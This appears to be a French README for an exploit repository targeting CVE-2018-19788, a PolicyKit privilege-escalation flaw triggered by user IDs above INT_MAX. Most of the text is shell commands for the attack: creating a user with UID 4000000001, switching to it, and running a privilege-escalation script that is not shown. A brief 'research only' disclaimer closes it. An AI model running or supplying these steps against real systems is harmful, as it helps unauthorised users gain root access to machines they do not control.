
Exploit ridiculement facile pour CVE-2018-19788
Exploit ridiculement facile pour CVE-2018-19788
Pour utiliser cet exploit, vous devez soit créer un utilisateur avec un UID > INT_MAX dans Policy Kit, soit déjà posséder un utilisateur à faibles privilèges avec cet UID.
L'UID peut être spécifié lors de la création de l'utilisateur comme suit, et utilisé avant l'exécution du script :
$ useradd -u 4000000001 PrivEsc
$ passwd PrivEsc
$ su PrivEsc
$ chmod +x /tmp/CVE-2018-19788_PrivEsc.sh
$ ./tmp/CVE-2018-19788_PrivEsc.sh
Veuillez noter que ceci est uniquement à des fins de recherche et que vous êtes responsable de votre propre utilisation de tout code trouvé dans ce dépôt ou tout autre, comme le bon sens l'exige.